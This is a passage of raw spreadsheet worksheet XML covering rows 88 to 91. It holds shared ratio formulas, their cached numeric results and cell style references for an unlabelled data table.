        <v>-</v>
      </c>
      <c r="BY88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="BZ88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CA88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="CB88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CC88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CD88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CE88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="CF88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CG88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CH88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CI88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CJ88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CK88" s="501">
        <f t="shared" si="78"/>
        <v>1</v>
      </c>
      <c r="CL88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="CM88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CN88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CO88" s="501">
        <f t="shared" si="78"/>
        <v>0.3333333333</v>
      </c>
      <c r="CP88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CQ88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CR88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="CS88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CT88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CU88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="CV88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CW88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="CX88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CY88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="CZ88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="DA88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="DB88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="DC88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="DD88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DE88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DF88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DG88" s="501" t="str">
        <f t="shared" si="78"/>
        <v>-</v>
      </c>
      <c r="DH88" s="501">
        <f t="shared" si="78"/>
        <v>0.04</v>
      </c>
      <c r="DI88" s="501">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DJ88" s="502">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DK88" s="271"/>
      <c r="DO88" s="279"/>
      <c r="DP88" s="271"/>
      <c r="DQ88" s="271"/>
      <c r="DR88" s="271"/>
      <c r="DS88" s="271"/>
      <c r="DT88" s="271"/>
      <c r="DU88" s="271"/>
      <c r="DV88" s="271"/>
      <c r="DW88" s="271"/>
      <c r="DX88" s="271"/>
      <c r="DY88" s="271"/>
      <c r="DZ88" s="271"/>
      <c r="EA88" s="271"/>
      <c r="EB88" s="271"/>
      <c r="EC88" s="271"/>
      <c r="ED88" s="280"/>
      <c r="EG88" s="279"/>
      <c r="EH88" s="271"/>
      <c r="EI88" s="271"/>
      <c r="EJ88" s="271"/>
      <c r="EK88" s="271"/>
      <c r="EL88" s="271"/>
      <c r="EM88" s="271"/>
      <c r="EN88" s="271"/>
      <c r="EO88" s="271"/>
      <c r="EP88" s="271"/>
      <c r="EQ88" s="271"/>
      <c r="ER88" s="271"/>
      <c r="ES88" s="271"/>
      <c r="ET88" s="271"/>
      <c r="EU88" s="271"/>
      <c r="EV88" s="271"/>
      <c r="EW88" s="271"/>
      <c r="EX88" s="271"/>
      <c r="EY88" s="271"/>
      <c r="EZ88" s="271"/>
      <c r="FA88" s="280"/>
    </row>
    <row r="89">
      <c r="J89" s="277"/>
      <c r="K89" s="352" t="s">
        <v>2578</v>
      </c>
      <c r="L89" s="403" t="s">
        <v>2579</v>
      </c>
      <c r="M89" s="403" t="s">
        <v>2580</v>
      </c>
      <c r="N89" s="404" t="s">
        <v>2581</v>
      </c>
      <c r="O89" s="278"/>
      <c r="Q89" s="271"/>
      <c r="R89" s="386" t="s">
        <v>2556</v>
      </c>
      <c r="S89" s="501">
        <f t="shared" ref="S89:V89" si="79">IF(S$33=0,"-",S41/S$33)</f>
        <v>0.01120311739</v>
      </c>
      <c r="T89" s="501" t="str">
        <f t="shared" si="79"/>
        <v>-</v>
      </c>
      <c r="U89" s="501">
        <f t="shared" si="79"/>
        <v>0.8387096774</v>
      </c>
      <c r="V89" s="501">
        <f t="shared" si="79"/>
        <v>0.8333333333</v>
      </c>
      <c r="W89" s="501">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="X89" s="501">
        <f t="shared" ref="X89:AF89" si="81">IF(X$33=0,"-",X41/X$33)</f>
        <v>0</v>
      </c>
      <c r="Y89" s="501">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="Z89" s="501">
        <f t="shared" si="81"/>
        <v>0.06715449074</v>
      </c>
      <c r="AA89" s="501">
        <f t="shared" si="81"/>
        <v>0.03424657534</v>
      </c>
      <c r="AB89" s="501">
        <f t="shared" si="81"/>
        <v>0.5263157895</v>
      </c>
      <c r="AC89" s="501">
        <f t="shared" si="81"/>
        <v>0.4285714286</v>
      </c>
      <c r="AD89" s="501">
        <f t="shared" si="81"/>
        <v>0.005976095618</v>
      </c>
      <c r="AE89" s="501">
        <f t="shared" si="81"/>
        <v>0.1666666667</v>
      </c>
      <c r="AF89" s="502">
        <f t="shared" si="81"/>
        <v>0.9978354978</v>
      </c>
      <c r="AG89" s="271"/>
      <c r="AH89" s="386" t="s">
        <v>2556</v>
      </c>
      <c r="AI89" s="501">
        <f t="shared" ref="AI89:DJ89" si="82">IF(AI$29=0,"-",AI41/AI$29)</f>
        <v>0.002450980392</v>
      </c>
      <c r="AJ89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AK89" s="501">
        <f t="shared" si="82"/>
        <v>52</v>
      </c>
      <c r="AL89" s="501">
        <f t="shared" si="82"/>
        <v>10</v>
      </c>
      <c r="AM89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AN89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="AO89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="AP89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="AQ89" s="501">
        <f t="shared" si="82"/>
        <v>0.08771929825</v>
      </c>
      <c r="AR89" s="501">
        <f t="shared" si="82"/>
        <v>0.75</v>
      </c>
      <c r="AS89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="AT89" s="501">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="AU89" s="501">
        <f t="shared" si="82"/>
        <v>230.5</v>
      </c>
      <c r="AV89" s="501">
        <f t="shared" si="82"/>
        <v>393.6666667</v>
      </c>
      <c r="AW89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="AX89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AY89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="AZ89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BA89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BB89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="BC89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BD89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="BE89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BF89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BG89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BH89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BI89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BJ89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BK89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BL89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BM89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BN89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BO89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="BP89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="BQ89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BR89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="BS89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BT89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BU89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="BV89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BW89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BX89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="BY89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="BZ89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CA89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="CB89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CC89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CD89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CE89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="CF89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CG89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CH89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CI89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CJ89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CK89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CL89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="CM89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CN89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CO89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CP89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CQ89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CR89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="CS89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CT89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CU89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="CV89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CW89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="CX89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CY89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="CZ89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="DA89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="DB89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="DC89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="DD89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="DE89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="DF89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="DG89" s="501" t="str">
        <f t="shared" si="82"/>
        <v>-</v>
      </c>
      <c r="DH89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="DI89" s="501">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="DJ89" s="502">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="DK89" s="271"/>
      <c r="DO89" s="279"/>
      <c r="DP89" s="271"/>
      <c r="DQ89" s="271"/>
      <c r="DR89" s="271"/>
      <c r="DS89" s="271"/>
      <c r="DT89" s="271"/>
      <c r="DU89" s="271"/>
      <c r="DV89" s="271"/>
      <c r="DW89" s="271"/>
      <c r="DX89" s="271"/>
      <c r="DY89" s="271"/>
      <c r="DZ89" s="271"/>
      <c r="EA89" s="271"/>
      <c r="EB89" s="271"/>
      <c r="EC89" s="271"/>
      <c r="ED89" s="280"/>
      <c r="EG89" s="279"/>
      <c r="EH89" s="271"/>
      <c r="EI89" s="271"/>
      <c r="EJ89" s="271"/>
      <c r="EK89" s="271"/>
      <c r="EL89" s="271"/>
      <c r="EM89" s="271"/>
      <c r="EN89" s="271"/>
      <c r="EO89" s="271"/>
      <c r="EP89" s="271"/>
      <c r="EQ89" s="271"/>
      <c r="ER89" s="271"/>
      <c r="ES89" s="271"/>
      <c r="ET89" s="271"/>
      <c r="EU89" s="271"/>
      <c r="EV89" s="271"/>
      <c r="EW89" s="271"/>
      <c r="EX89" s="271"/>
      <c r="EY89" s="271"/>
      <c r="EZ89" s="271"/>
      <c r="FA89" s="280"/>
    </row>
    <row r="90">
      <c r="J90" s="277"/>
      <c r="K90" s="500">
        <f>K55/$N$31</f>
        <v>0.0375917641</v>
      </c>
      <c r="L90" s="501">
        <f t="shared" ref="L90:N90" si="83">L55/$N$34</f>
        <v>14.79702063</v>
      </c>
      <c r="M90" s="501">
        <f t="shared" si="83"/>
        <v>375.0137816</v>
      </c>
      <c r="N90" s="502">
        <f t="shared" si="83"/>
        <v>417.9732335</v>
      </c>
      <c r="O90" s="278"/>
      <c r="Q90" s="271"/>
      <c r="R90" s="386" t="s">
        <v>2557</v>
      </c>
      <c r="S90" s="501">
        <f t="shared" ref="S90:V90" si="84">IF(S$33=0,"-",S42/S$33)</f>
        <v>0.01120311739</v>
      </c>
      <c r="T90" s="501" t="str">
        <f t="shared" si="84"/>
        <v>-</v>
      </c>
      <c r="U90" s="501">
        <f t="shared" si="84"/>
        <v>0.8387096774</v>
      </c>
      <c r="V90" s="501">
        <f t="shared" si="84"/>
        <v>0.8333333333</v>
      </c>
      <c r="W90" s="501">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="X90" s="501">
        <f t="shared" ref="X90:AF90" si="85">IF(X$33=0,"-",X42/X$33)</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y90" s="501">
        <f t="shared" si="85"/>
        <v>0.1428571429</v>
      </c>
      <c r="Z90" s="501">
        <f t="shared" si="85"/>
        <v>0.06739053464</v>
      </c>
      <c r="AA90" s="501">
        <f t="shared" si="85"/>
        <v>0.9589041096</v>
      </c>
      <c r="AB90" s="501">
        <f t="shared" si="85"/>
        <v>0.6315789474</v>
      </c>
      <c r="AC90" s="501">
        <f t="shared" si="85"/>
        <v>0.5714285714</v>
      </c>
      <c r="AD90" s="501">
        <f t="shared" si="85"/>
        <v>0.005976095618</v>
      </c>
      <c r="AE90" s="501">
        <f t="shared" si="85"/>
        <v>0.1666666667</v>
      </c>
      <c r="AF90" s="502">
        <f t="shared" si="85"/>
        <v>0.9978354978</v>
      </c>
      <c r="AG90" s="271"/>
      <c r="AH90" s="386" t="s">
        <v>2557</v>
      </c>
      <c r="AI90" s="501">
        <f t="shared" ref="AI90:DJ90" si="86">IF(AI$29=0,"-",AI42/AI$29)</f>
        <v>0.002344416027</v>
      </c>
      <c r="AJ90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="AK90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="AL90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="AM90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="AN90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="AO90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="AP90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="AQ90" s="501">
        <f t="shared" si="86"/>
        <v>0.8859649123</v>
      </c>
      <c r="AR90" s="501">
        <f t="shared" si="86"/>
        <v>0.25</v>
      </c>
      <c r="AS90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="AT90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="AU90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="AV90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="AW90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="AX90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="AY90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="AZ90" s="501">
        <f t="shared" si="86"/>
        <v>0.5</v>
      </c>
      <c r="BA90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="BB90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="BC90" s="501">
        <f t="shared" si="86"/>
        <v>0.6666666667</v>
      </c>
      <c r="BD90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="BE90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="BF90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="BG90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="BH90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="BI90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="BJ90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="BK90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="BL90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="BM90" s="501">
        <f t="shared" si="86"/>
        <v>0.1725394897</v>
      </c>
      <c r="BN90" s="501">
        <f t="shared" si="86"/>
        <v>0.0003861003861</v>
      </c>
      <c r="BO90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="BP90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="BQ90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="BR90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="BS90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="BT90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="BU90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="BV90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="BW90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="BX90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="BY90" s="501">
        <f t="shared" si="86"/>
        <v>0.5</v>
      </c>
      <c r="BZ90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="CA90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="CB90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CC90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CD90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="CE90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="CF90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="CG90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CH90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="CI90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="CJ90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CK90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="CL90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="CM90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CN90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CO90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="CP90" s="501">
        <f t="shared" si="86"/>
        <v>0.5</v>
      </c>
      <c r="CQ90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CR90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="CS90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CT90" s="501">
        <f t="shared" si="86"/>
        <v>0.005988023952</v>
      </c>
      <c r="CU90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="CV90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CW90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="CX90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CY90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="CZ90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="DA90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="DB90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="DC90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="DD90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="DE90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="DF90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="DG90" s="501" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="DH90" s="501">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="DI90" s="501">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="DJ90" s="502">
        <f t="shared" si="86"/>
        <v>1</v>
      </c>
      <c r="DK90" s="271"/>
      <c r="DO90" s="279"/>
      <c r="DP90" s="271"/>
      <c r="DQ90" s="271"/>
      <c r="DR90" s="271"/>
      <c r="DS90" s="271"/>
      <c r="DT90" s="271"/>
      <c r="DU90" s="271"/>
      <c r="DV90" s="271"/>
      <c r="DW90" s="271"/>
      <c r="DX90" s="271"/>
      <c r="DY90" s="271"/>
      <c r="DZ90" s="271"/>
      <c r="EA90" s="271"/>
      <c r="EB90" s="271"/>
      <c r="EC90" s="271"/>
      <c r="ED90" s="280"/>
      <c r="EG90" s="279"/>
      <c r="EH90" s="271"/>
      <c r="EI90" s="271"/>
      <c r="EJ90" s="271"/>
      <c r="EK90" s="271"/>
      <c r="EL90" s="271"/>
      <c r="EM90" s="271"/>
      <c r="EN90" s="271"/>
      <c r="EO90" s="271"/>
      <c r="EP90" s="271"/>
      <c r="EQ90" s="271"/>
      <c r="ER90" s="271"/>
      <c r="ES90" s="271"/>
      <c r="ET90" s="271"/>
      <c r="EU90" s="271"/>
      <c r="EV90" s="271"/>
      <c r="EW90" s="271"/>
      <c r="EX90" s="271"/>
      <c r="EY90" s="271"/>
      <c r="EZ90" s="271"/>
      <c r="FA90" s="280"/>
    </row>
    <row r="91">
      <c r="J91" s="277"/>
      <c r="K91" s="434"/>
      <c r="L91" s="353"/>
      <c r="M91" s="353"/>
      <c r="N91" s="354"/>
      <c r="O91" s="278"/>
      <c r="Q91" s="271"/>
      <c r="R91" s="386" t="s">
        <v>2558</v>
      </c>
      <c r="S91" s="501">
        <f t="shared" ref="S91:V91" si="87">IF(S$33=0,"-",S43/S$33)</f>
        <v>0.01217730151</v>
      </c>
      <c r="T91" s="501" t="str">
        <f t="shared" si="87"/>
        <v>-</v>
      </c>
      <c r="U91" s="501">
        <f t="shared" si="87"/>
        <v>0.8709677419</v>
      </c>
      <c r="V91" s="501">
        <f t="shared" si="87"/>
        <v>0.8333333333</v>
      </c>
      <c r="W91" s="501">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="X91" s="501">
        <f t="shared" ref="X91:AF91" si="88">IF(X$33=0,"-",X43/X$33)</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y91" s="501">
        <f t="shared" si="88"/>
        <v>0.1428571429</v>
      </c>
      <c r="Z91" s="501">
        <f t="shared" si="88"/>
        <v>0.06833471026</v>
      </c>
      <c r="AA91" s="501">
        <f t="shared" si="88"/>
        <v>0.9657534247</v>
      </c>
      <c r="AB91" s="501">
        <f t="shared" si="88"/>
        <v>0.6315789474</v>
      </c>
      <c r="AC91" s="501">
        <f t="shared" si="88"/>
        <v>0.7142857143</v>
      </c>
      <c r="AD91" s="501">
        <f t="shared" si="88"/>
        <v>0.005976095618</v>
      </c>
      <c r="AE91" s="501">
        <f t="shared" si="88"/>
        <v>0.3333333333</v>
      </c>
      <c r="AF91" s="502">
        <f t="shared" si="88"/>
        <v>0.9978354978</v>
      </c>
      <c r="AG91" s="271"/>
      <c r="AH91" s="386" t="s">
        <v>2558</v>
      </c>
      <c r="AI91" s="501">
        <f t="shared" ref="AI91:DJ91" si="89">IF(AI$29=0,"-",AI43/AI$29)</f>
        <v>0.002344416027</v>
      </c>
      <c r="AJ91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="AK91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="AL91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="AM91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="AN91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AO91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AP91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AQ91" s="501">
        <f t="shared" si="89"/>
        <v>0.9035087719</v>
      </c>
      <c r="AR91" s="501">
        <f t="shared" si="89"/>
        <v>0.25</v>
      </c>
      <c r="AS91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AT91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="AU91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="AV91" s="501">
        <f t="shared" si="89"/>
        <v>0.6666666667</v>
      </c>
      <c r="AW91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AX91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="AY91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AZ91" s="501">
        <f t="shared" si="89"/>
        <v>0.5</v>
      </c>
      <c r="BA91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="BB91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="BC91" s="501">
        <f t="shared" si="89"/>
        <v>0.6666666667</v>
      </c>
      <c r="BD91" s="501" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="BE91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="BF91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="BG91" s="501">
        <f t="shared" si="89"/>
        <v>1</v>
      </c>
      <c r="BH91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="BI91" s="501">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="BJ91" s="501">
